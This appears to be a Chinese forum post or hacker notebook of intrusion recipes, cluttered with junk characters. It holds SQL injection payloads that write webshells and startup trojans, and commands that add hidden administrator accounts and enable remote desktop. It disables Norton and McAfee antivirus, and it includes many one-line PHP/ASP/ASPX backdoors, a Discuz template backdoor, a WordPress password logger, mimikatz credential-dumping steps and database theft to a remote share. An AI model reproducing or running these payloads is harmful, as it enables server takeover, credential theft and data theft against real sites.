2 z- P7 Z a9 P+ a中文版本操作系统中针对mysql添加用户完整代码:/ l8 K4 V- i, {: |% [
! J/ U" o5 r# q0 iuse test;
% @( I" \+ P+ b+ h- F1 dcreate table a (cmd text);
6 J4 d! G! T+ iinsert into a values ("set wshshell=createobject (""wscript.shell"") " );
2 B, `# K) B/ a" u2 ginsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );% m6 e- g. y# e) P0 w
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
& J- F. z" d( X L9 Z9 M# z6 o$ Oselect * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
9 Z5 R% l! w8 `" Z0 j7 N# cdrop table a;( `) h6 b; a( w, t
1 r3 l$ Z5 k* y* j* D+ ^英文版本:* S' {- V* g. a- C8 P; ~
. K3 P( F& v$ y5 D3 Duse test;! f9 W9 z4 s# f) H. Q( n0 W
create table a (cmd text); L }" i5 A/ J% K
insert into a values ("set wshshell=createobject (""wscript.shell"") " );
) U3 V! U4 b% t( l" Q- M* yinsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
3 v3 W e1 j( p+ G. o! F, y; Q. G `insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );0 x+ T! t; d. ^% |
select * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";
5 |9 Q1 K$ I4 \& T1 P* N5 ?drop table a;
0 X6 o/ |" e9 H. _& d- I. r. Y9 T M5 E
( |' E9 s, `5 K1 Fcreate table a (cmd BLOB);
& u: G- T% Y( N$ N5 n5 T4 L: B1 ~& Tinsert into a values (CONVERT(木马的16进制代码,CHAR));. y+ [' g8 A) A+ W3 W# y
select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'7 X2 G$ l4 _* U' q0 e1 W4 a0 `
drop table a;
0 z: [" |6 w( W# X' m
& r# J5 \& j5 ?+ [' k# M9 d记录一下怎么处理变态诺顿
1 A% h, g$ M9 c6 t4 s" l7 Z' }查看诺顿服务的路径4 n; |( [4 D! t9 Z" m! t( |3 b2 E
sc qc ccSetMgr7 ]. j8 L7 U! k7 ~; u6 J3 d& Z
然后设置权限拒绝访问。做绝一点。。7 `* p X/ p4 Y9 j, p
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system7 ]* ?+ [. J- I: |/ b5 Y
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"( ?& o8 }; F# f: b
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators
6 I) `8 E1 x+ D: n: z, Ccacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone
! T' W- ?$ J; g" |/ j/ w, q5 J
- e9 o4 n# H3 a然后再重启服务器0 u* F7 y5 {$ F- Q' s( Y0 f
iisreset /reboot
5 D( V% ~" f# x9 L这样就搞定了。。不过完事后。记得恢复权限。。。。
/ P+ x( h: _4 q- k; Z1 m7 g9 Bcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F
- r' r! J2 K+ v$ J$ ~4 C2 T- wcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F+ c* l6 F& B% h1 o
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F
& x5 x; J+ Z5 y/ x5 Lcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F( x# [9 b/ R. N( a& ]; M& Q! j
SELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin3 W1 S: O+ N$ a5 @
7 `. L; U2 J" r4 a* X
EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')3 A6 ^% N2 ]' k- R* D
6 u1 ?4 X4 {, A& I3 |postgresql注射的一些东西
6 X2 m! T3 s9 A$ \' e如何获得webshell3 z3 t8 d8 b& C5 L2 ^) W
http://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null); ( k- h7 J6 s! ^6 L f
http://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$); 9 R' N% p, L+ G% W& Q4 r5 n
http://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;3 V: O+ J! s5 L( v R, e2 j
如何读文件
# q/ G; w/ r$ V- ]http://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);$ R- a" X2 ^0 n5 S# s( N
http://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;
- y) J; q/ N5 O9 F2 ?http://127.0.0.1/postgresql.php?id=1;select * from myfile;2 V0 y) K) f( Y- M+ d
" V! k& d# n+ X" J
z执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。
S0 a( E' k: H" j) Q5 O当然,这些的postgresql的数据库版本必须大于8.X* N6 Z0 ~* k W a1 P
创建一个system的函数:
: m8 `9 f3 N7 f6 w! L6 j. `CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT
8 h0 Z" c8 j0 ~8 F9 s; q$ @- q2 C+ g% }; J a: h
创建一个输出表:& a3 l3 j8 @- x! z1 t% k
CREATE TABLE stdout(id serial, system_out text)- C# E6 [- S! \5 `+ ~
( m( G4 A3 l* _4 e2 E$ U3 |; V执行shell,输出到输出表内:0 I. i4 o" H& K
SELECT system('uname -a > /tmp/test')
" D6 m( t; t+ ^9 _+ | F! |
) Z& s; e9 z! Y4 T' S& L0 V; Z0 Scopy 输出的内容到表里面;8 [ J; K; C) f
COPY stdout(system_out) FROM '/tmp/test'
, [8 G4 G) F$ l0 W# c8 r1 A( t1 d. V
从输出表内读取执行后的回显,判断是否执行成功7 P+ }) F& B. ` `% a- i
# c4 H: L: y( S& p/ L M4 JSELECT system_out FROM stdout8 N, N* | _$ Q' @8 b6 @* }4 O
下面是测试例子' r3 P( ?: n7 Y4 \) Z! |
$ O7 v0 w* L! O& \
/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) -- $ [+ W" Q" M( r; I! }8 i$ N( S
- R! X c; j6 L$ i) P/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'4 f6 b; `9 J3 \/ @
STRICT --8 x6 M/ f; F5 A T+ @3 E; X$ u" S9 C/ E
3 _1 p; _/ v5 B O) G; b; { L6 B/store.php?id=1; SELECT system('uname -a > /tmp/test') --
, ]+ Q- o& ^' @0 t/ g2 L
: s: C; S: h0 q; H" _! L/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --
) q6 A" C1 a9 e q6 c2 M* V; Y1 A& N" o
* U& f! Z2 N5 _5 V& H* T" l/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--
3 j: }9 [2 ^1 t2 y8 a8 Anet stop sharedaccess stop the default firewall: A9 C3 ^9 w8 v, u; D9 K6 ^
netsh firewall show show/config default firewall$ V& K' o# V v4 ~$ I
netsh firewall set notifications disable disable the notify when the program is disabled by the default firewall
2 J. O9 n8 a$ }1 H7 _# Hnetsh firewall add allowedprogram c:\1.exe Svchost add the program which is allowed by default firewall
1 W7 P; s+ W3 f1 n5 W# @修改3389端口方法(修改后不易被扫出)
; ?, G9 H0 P+ G$ }6 W修改服务器端的端口设置,注册表有2个地方需要修改
- M8 U; K O7 x, i+ q! x# ~
8 F; o& N7 k/ i. B e2 K Y[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]% P: g) r* z$ n4 }: g$ I7 H2 e
PortNumber值,默认是3389,修改成所希望的端口,比如6000, v. R1 ?9 W% v/ {% t8 Y
9 T' J" `" z- N. n# P9 b7 m; Q
第二个地方:
/ }4 d3 e8 h4 c- E% d+ W2 q1 H[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp]
( o3 e: a) `: S& RPortNumber值,默认是3389,修改成所希望的端口,比如6000
0 Q+ `0 X6 h: K2 E4 v2 v3 h' j
现在这样就可以了。重启系统就可以了# S0 A! u6 ^# U
2 w* f' X. x- Q7 x# {6 _, _
查看3389远程登录的脚本' c1 }. j( G7 V( `- g5 V
保存为一个bat文件
# q& {# ?7 B& u/ `1 t) n' k adate /t >>D:\sec\TSlog\ts.log
' H2 @4 [( v! W) Q* m' Ttime /t >>D:\sec\TSlog\ts.log
% y' y4 S, V9 t# r9 P& Q9 @netstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log* q- F3 H. [8 B$ r
start Explorer" l. V1 l5 q) W+ d- J; N
1 \/ W( z2 j2 I9 a7 I% ?mstsc的参数:% I* P0 [5 y( ^4 O/ c& N1 b" g+ [
' c: N c" d5 q! f6 Y
远程桌面连接 B O8 {$ f+ X' u! E& Q
, v" q6 {: J% m [0 A4 r8 LMSTSC [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]
; @0 D1 Y/ ^, P+ |1 z5 d [/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?, [* s) f Q/ _; j) ?, e
' m8 o3 V! y% ~
<Connection File> -- 指定连接的 .rdp 文件的名称。6 _; b0 o. F1 N' w# _
7 o9 q7 K# n5 h4 x& N/v:<server[:port]> -- 指定要连接到的终端服务器。" D) D5 k8 _8 K3 z. c
3 p! J7 B$ t, [+ r, g2 I/console -- 连接到服务器的控制台会话。7 V6 b6 D4 b8 G* i1 Z; _/ v" D$ e# V
/ _, r1 P5 P) X
/f -- 以全屏模式启动客户端。0 G; ?- q: M' T' O- W
8 c! ~6 Z2 V; o3 ~) O: U! v
/w:<width> -- 指定远程桌面屏幕的宽度。
/ a5 t5 Q- y% Q, F1 x8 E( a* s4 x9 Y' t4 G2 m# W
/h:<height> -- 指定远程桌面屏幕的高度。
- k0 w, H( \- n* q* B2 p$ n: Z0 G$ u: n; {* \
/edit -- 打开指定的 .rdp 文件来编辑。* e; i& k6 y1 K5 m$ P5 P
) y" G. ^. f3 t4 W3 K" j
/migrate -- 将客户端连接管理器创建的旧版& B( { O- Z) q6 Q! D/ I
连接文件迁移到新的 .rdp 连接文件。
' K6 F. l% h; R8 V- M
. o% }$ B- c8 {$ C L1 `, z1 i7 x% L
其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就
* f2 d& W7 x/ s5 H- pmstsc /console /v:124.42.126.xxx 突破终端访问限制数量
$ k: }* n" H& b( t0 F' `, t( A4 d9 S8 q4 g I
命令行下开启3389
# K" ^6 s" H5 R& u: W! L: Enet user asp.net aspnet /add
; e3 Z5 R4 U' Dnet localgroup Administrators asp.net /add
4 a; |8 V7 t g Ynet localgroup "Remote Desktop Users" asp.net /add
' P& g6 R! p1 x2 Q5 _1 z- @attrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D: N- E/ ?. v; }$ t9 j- |
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0
* X( i, h T7 eecho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1
# [4 k% D6 }& J5 Q- hecho Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f/ A6 ~" ?( o* F" T2 a
sc config rasman start= auto
* l S7 b2 A+ o% v- d$ ~' Csc config remoteaccess start= auto
% |! k8 i3 o( f, t2 Enet start rasman1 s; A. G2 v0 d4 Q& m4 n- ^
net start remoteaccess9 v+ e! m6 `9 v3 ^; F& _. }4 o H
Media
9 }/ @& {9 G# d& U, {! P<form id="frmUpload" enctype="multipart/form-data"
e0 ]2 I" \( y' Z4 P1 ~action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
7 q* v3 _: m" I$ q<input type="file" name="NewFile" size="50"><br>
, U* m( A+ h5 x<input id="btnUpload" type="submit" value="Upload">
" d4 J/ D! C+ u4 x</form>1 y0 c8 N4 y5 \4 p
2 q# O3 d X$ v( vcontrol userpasswords2 查看用户的密码! U) |& T* e0 F7 E" g0 I: c6 u$ T% v
access数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径
" X0 p% g: X5 o4 C( \* aSELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
, B) f1 ?4 T4 ^6 K/ J, {
2 h1 T) k/ j" X4 Z8 M141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:
5 p" m S. N5 r. ~5 W; x测试1:
- }6 Q0 W* M. Y. fSELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
+ d1 x) R9 i0 K2 }
- ~- K1 i+ P1 @$ d' B测试2:' a' C9 Q! t4 H9 E
1 n5 W- q! v0 X/ V+ t
create table dirs(paths varchar(100),paths1 varchar(100), id int)
8 ^4 s. C! o' U; Y, T) W1 l* K. P6 \( f6 F# {
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--9 G% q' F# U: V2 O6 ]5 {
1 y1 c: }1 m( e/ TSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1' Q( }7 a& N3 \0 E; k
关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令
) \1 l" q& v0 L0 o, O0 S* C可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;
1 k% @; U( A3 m! rnet stop mcafeeframework
5 @0 W( z( k+ T2 M% Y! g( O/ tnet stop mcshield
3 f& D% `2 _' V- D8 J8 Cnet stop mcafeeengineservice
8 |9 I' T& b5 Z- }- ]0 t4 }5 tnet stop mctaskmanager' I& I7 u8 X( |" b
http://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D9 x, B+ j2 ^: Z% b
, a# V0 G) T5 w( t% O, @ VNCDump.zip (4.76 KB, 下载次数: 1) 2 Z! L/ `; T3 R3 H* t
密码在线破解http://tools88.com/safe/vnc.php
: V( y& f+ v; j1 ~% L; e/ I6 V; X# ZVNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取
% ^% M* g" c7 r9 i; Y0 v' _
2 l; S, |+ |! kexec master..xp_cmdshell 'net user'
) I: I! s0 E4 w' G8 tmssql执行命令。
# H2 E/ x$ w. u% P8 d6 q7 E: @$ P获取mssql的密码hash查询
3 O+ r: m2 X( D6 F1 Q8 T1 {select name,password from master.dbo.sysxlogins/ r: x4 x+ K. f- y6 [; G+ ]
5 q- J3 z1 ]* K+ s* w
backup log dbName with NO_LOG;
+ A0 S- t& j3 I/ c! s) K kbackup log dbName with TRUNCATE_ONLY;
4 b) c" ?5 X, i$ jDBCC SHRINKDATABASE(dbName);
5 ~' S4 j0 V- y& X* Y- L% Tmssql数据库压缩
8 ?/ }0 {1 K2 {2 ]! c
+ l2 v( d5 V% |% P9 h& O; Q/ gRar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK
% j, _# K* r8 e& F: c5 L将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。
- E* d7 l( ]2 u& z0 r' p6 }! ^8 Q( \0 Y: V4 c6 x( x& R
backup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'
6 h/ m$ z! U+ R; C4 \备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak( R. S# x' p0 C6 F2 }8 c8 A+ n
! M" Y, ?0 _1 T# u3 P$ m& m0 Y% p
Discuz!nt35渗透要点:
9 b) V3 `- H9 U7 u: `: a6 l2 R(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default" N; J7 g4 G7 Y
(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
4 y% n6 B6 K2 F" E' X( a(3)保存。
$ M9 h0 s2 @1 [& N0 V(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass
' z0 y! Z% Y0 w( yd:\rar.exe a -r d:\1.rar d:\website\8 H* f" f3 `; v {' b1 y: _) E
递归压缩website2 t; a% m& C% p/ L$ L
注意rar.exe的路径9 J. H6 y/ n5 l
W2 v. o1 i- R) z5 ^7 \1 k8 x
<?php
; ]! u1 W) y$ e$ b" l% P* G) t; y9 E- B- }
$telok = "0${@eval($_POST[xxoo])}";
8 b6 v, T# [' f0 R2 g6 h) Z# r: k: B9 Y6 }9 V( A- d
$username = "123456";6 D8 l+ a/ X+ Y7 W- S: A& h9 n0 s2 A# v
/ y- b# i8 X/ N
$userpwd = "123456";" B! c0 o' Z3 L+ r' ]
8 l. z9 w5 R. N7 |7 g9 {7 o
$telhao = "123456";. `4 _) @1 [- f; H" b" l: d
+ ~$ x" l, j, _! y/ G( k7 h% {% K$telinfo = "123456";9 T& c6 y1 u! P
9 ~9 ~+ n! @: t1 P/ M, l8 P?>
5 J6 ~/ e& n ^1 [) O% mphp一句话未过滤插入一句话木马
/ y* W% C) m7 P! ^2 _' ?' B: X7 F" h, i: U$ i4 _, Q
站库分离脱裤技巧
! H9 B' |' x( _exec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'+ C: [6 [1 M( R$ W# q+ k1 D# J9 b
exec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'
7 a$ r' G+ |3 { d条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。( s- m* y6 F, w! n
这儿利用的是马儿的专家模式(自己写代码)。
: }, E' V) {/ c9 f' u) s7 T: i1 ]9 hini_set('display_errors', 1);, j4 I/ w3 l M! V" v! @; g
set_time_limit(0);
5 n1 ?# Q% b9 T P: b( o! Xerror_reporting(E_ALL);0 I! G+ j4 F- C7 N8 I/ [
$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());
# }9 u* W" s/ A3 p9 B1 k" Nmysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());
& z0 K$ a& H6 k1 `4 H) s$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());3 v& [6 F: R2 i
$i = 0;
0 w( L3 N" g/ `4 W2 P+ M+ {$tmp = '';4 e1 A+ }2 ?# _5 p+ O/ A2 z
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {: N5 v! P$ U0 t, b) Y5 p6 E# M5 G
$i = $i+1;
X, G7 p: u: Q: w8 ]4 U $tmp .= implode("::", $row)."\n";
0 c9 d3 i5 O f, M% I- p if(!($i%500)){//500条写入一个文件
; Y7 D6 S4 o7 ]! J# ?( W8 D5 a2 d $filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';
9 o. I; ^ O: I U" I file_put_contents($filename,$tmp);
- R/ m4 ]8 u% U+ g) f! q: p V7 l $tmp = '';: f# |& J9 V8 f r
}0 {# B# V/ y6 p
}
' B; l$ [% V1 V# amysql_free_result($result);
+ x7 ]) h* U P1 a: V! Q2 w
4 A0 j9 d' u/ U6 ^* P6 W L1 L
3 m W- y+ |& z8 q" Q! ~, `7 L
) g& w8 l1 @! m3 _9 G" s5 m- q//down完后delete) l. {2 E1 @1 E G5 ^; w- h; b. i
$ P# w/ u( o `5 J- n* n1 B# m. g( K2 j; ?
ini_set('display_errors', 1);- B& j# [' Q! W. i: X0 N
error_reporting(E_ALL);- Z4 J0 E- s8 K1 ~6 }6 M4 t
$i = 0;
( \2 e1 I* J) S; O# t+ b1 U: cwhile($i<32) {
3 P: E; d4 k3 U& B, ~8 R $i = $i+1;& {* |+ j5 J" J: w
$filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';
o, j6 ? U4 V! u7 O; P unlink($filename);# S4 I# w8 s) z7 P
}
+ Y7 V" G6 j+ i, D/ jhttprint 收集操作系统指纹
) ~+ Z: Z1 v: \6 [# J扫描192.168.1.100的所有端口) [3 V# D8 I) S5 h: d3 k6 J6 c
nmap –PN –sT –sV –p0-65535 192.168.1.100
3 G% ~! M0 @& U: I( E2 @host -t ns www.owasp.org 识别的名称服务器,获取dns信息
& c' M6 c( l% Y& Xhost -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输4 j* I9 C3 f6 e7 i
Netcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host" u# U/ G7 C5 d, t6 ]
( c% _ O' n+ F' F0 K* q2 w
Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)
# G/ \8 J+ I! R5 @. S4 H6 O T$ H# n4 ]
MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)
' z8 h( M% r8 x( y5 _
. i* c8 h& i) z1 h# j Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x
7 {0 D( h' W) I5 m% L; _. _1 R P. ^ m
DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)
, k1 U8 |* R0 q" Z- v. j
& A, H% \, u' h http://net-square.com/msnpawn/index.shtml (要求安装)
H- n3 Y$ k% Y. d; Q B
( L+ i& _6 `: S/ v tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)
& U; z; ?$ |) Y% y" O e% W$ n
; i6 V; O, N. a$ j( d# y) j" H9 w I SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)7 j9 I; S6 d. j+ X$ a2 P- {; j/ ?: J5 s
set names gb2312
2 p/ v3 j" K5 Z) d. x5 |" I4 ]导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。- I( U4 U$ n$ G" G* \
7 ]# N- g x" d: G$ F7 I7 n" G
mysql 密码修改
, v7 K4 h% o$ j w1 y; m& qUPDATE mysql.user SET password=PASSWORD("newpass") whereuser="mysqladmin ”
s' m; n2 y: u$ R6 p0 v" Q+ O Mupdate user set password=PASSWORD('antian365.com') where user='root';
5 x: U5 j! X% {% a/ r: R0 R; bflush privileges;
c8 h- y( F6 r* x% z/ T' U3 ~高级的PHP一句话木马后门( K( D- I( n0 F
3 E3 d- l# m$ L7 B入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀
2 i% o, E* q L1 P3 n
% N1 k5 ^8 A: a7 ]' h1、7 L" I. y$ V/ R1 U; f
6 d5 ` ~7 o, Q f$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
: L$ M7 P" v; x! I Z1 Q" A' F% A" U/ l2 _4 I/ [
$hh("/[discuz]/e",$_POST['h'],"Access");
8 F& V. q' \: E: `/ u: |2 S" ~- ~4 S0 s: z7 B9 j6 I
//菜刀一句话
: j# m" B I3 P' L& k' \9 D
2 u7 ]4 s' R2 e& I. o2、1 S G0 u( k+ C: P4 ^3 J# Z) d2 b
1 r$ ?% V/ O* X2 Q5 ?, a
$filename=$_GET['xbid'];
, B# J5 v+ p: M3 T5 ]8 @% I! f7 x t
include ($filename);
. r2 Y5 d- j. I5 I7 @$ ]3 O+ q) w$ {' H& A9 s
//危险的include函数,直接编译任何文件为php格式运行
4 {2 u7 D! x- v/ p( @/ i/ |( P% K% x8 i$ \
3、
% x# W! e. d; h" y' F( t1 @/ P- x
& ^) @7 y, d) ]$reg="c"."o"."p"."y";' k9 L7 g" k% ~
1 [5 V/ ~" M# Y" o2 B$ D l' x/ ~
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);3 b2 @! C' X! y" a( o
3 K" G0 E5 E' E7 F9 x//重命名任何文件
, w) N' ?7 `( ^' b7 j
. H( j0 J" M1 r5 |& z4、: U* \* P1 m1 m4 z8 N, V
! A5 M4 V+ t9 _; Y& b% m ^
$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
* q+ d8 [1 S6 A% s1 m8 ]
- S) ~5 f1 v9 Z6 [2 M3 ]3 k3 h. ]$gzid("/[discuz]/e",$_POST['h'],"Access");$ I9 H- I) P* Y
/ Q# V8 }. o, d5 B# D
//菜刀一句话 e9 o m$ e- r% o
: {8 O- m( } | n8 X) B- t n
5、include ($uid);
7 k4 S- L) }* E& Z5 I# x ]" M3 N0 B2 M
//危险的include函数,直接编译任何文件为php格式运行,POST
8 \7 a# S: y% i4 Q" R7 l9 x: y7 S/ K7 r2 Z! @. Z' V
8 J" {6 \8 `' ^//gif插一句话
( F! v0 ~. ^$ H& ?, H) G: _6 C' _1 F
6、典型一句话8 E5 l. ]/ Q" `( ~. u9 c) J) o# d
" m# l. s* ]0 t5 W- [( @
程序后门代码 y$ X# I9 C- G8 J3 k
<?php eval_r($_POST[sb])?>
3 R6 L) `2 j, N) ], l# X* C: B程序代码
4 H n: B. i( Q) @( K' ~3 z* r7 ?5 ^<?php @eval_r($_POST[sb])?>+ T+ O- E6 M! d6 J- M, R# b' I2 ]6 D
//容错代码$ M; w* k7 r* O z6 h, m
程序代码
. B1 ~ j2 j9 P0 d<?php assert($_POST[sb]);?>
5 P% p; I3 w9 z7 g7 k8 Z0 Q# @2 z/ b//使用lanker一句话客户端的专家模式执行相关的php语句
9 d& v9 S9 N! w) v! J9 c N2 m程序代码
* h- o7 h* A! ?' }. S<?$_POST['sa']($_POST['sb']);?>
, v. r4 n! U6 x* l0 W9 U( B4 V {程序代码! d! r5 |' L, P2 e! D
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>7 V6 J8 q/ ^" r1 n: ?: B3 x
程序代码
! K0 q* @8 a+ u<?php, T; Y% G- u. X. G$ M9 b% `' L
@preg_replace("/[email]/e",$_POST['h'],"error");
+ r6 ^4 e3 ~- e. b U?>, S" [+ X7 w% G: G8 T! \+ ~9 R: F3 m
//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入
0 e5 G1 u6 M4 l5 r1 k) Y' z1 Q9 h( F9 R程序代码
9 b8 T2 {) o/ {* v<O>h=@eval_r($_POST[c]);</O>
0 V2 W( M1 H$ f) O# q+ B程序代码" u; ?3 L' L* F2 C/ f
<script language="php">@eval_r($_POST[sb])</script>
( K! O9 S9 `0 l1 t//绕过<?限制的一句话
" a5 ~: k7 ~& l) V' W8 G
4 m) R! y# L- V8 n% O9 {http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip
. O$ S" F9 A" r详细用法: o' a7 l- Y$ Q- r* Y ~* ~
1、到tools目录。psexec \\127.0.0.1 cmd& \7 s% U) j' u) P$ P
2、执行mimikatz
" j- p) j/ B. U5 @3、执行 privilege::debug7 i' K6 u& ], P" N) ^: U
4、执行 inject::process lsass.exe sekurlsa.dll; H/ t1 u2 d: B& @# n- `4 S# Z
5、执行@getLogonPasswords
( N$ v: F( d6 G/ Y2 L6、widget就是密码
5 B5 X) v" `& ? R) |7、exit退出,不要直接关闭否则系统会崩溃。" c0 m( H, g! S& O
; m" H0 P: V* B' ^5 Z: Z. D$ zhttp://www.monyer.com/demo/monyerjs/ js解码网站比较全面4 G) d! ?5 u' | n4 T, A7 X
* [! ]+ a! |5 p! f
自动查找系统高危补丁5 Q; n' p0 X8 a, ]$ `) @" }5 e
systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt) x3 z; s8 w K
3 x) @0 o! D' k/ _' f0 R突破安全狗的一句话aspx后门
0 P0 b1 T, [' u9 v3 b<%@ Page Language="C#" ValidateRequest="false" %>
9 ]. q! S# C \" ^<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
. C7 ]- T1 }; q1 qwebshell下记录WordPress登陆密码/ B, r$ h' f. T
webshell下记录Wordpress登陆密码方便进一步社工
2 Y( {: R* y' g- Y8 j K, N在文件wp-login.php中539行处添加:
8 @3 v. }: R& J; X2 o// log password! _; H" n5 _5 k2 j" A/ K3 s
$log_user=$_POST['log'];
% t* g4 Q P3 j& s6 i, q: w& C! M$log_pwd=$_POST['pwd'];
% K+ n, I( e# }/ r3 m% f$log_ip=$_SERVER["REMOTE_ADDR"];
4 ?( O: j9 b2 C9 @, U# {5 x$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;
/ ^" m' b; m! O8 M1 x3 `2 e1 a$txt=$txt.”\r\n”;6 j( S+ X3 o, F b
if($log_user&&$log_pwd&&$log_ip){) b$ z, }1 ~% D8 R+ b3 K
@fwrite(fopen(‘pwd.txt’,”a+”),$txt); P% O' Y) Y! _4 k- T- b
}
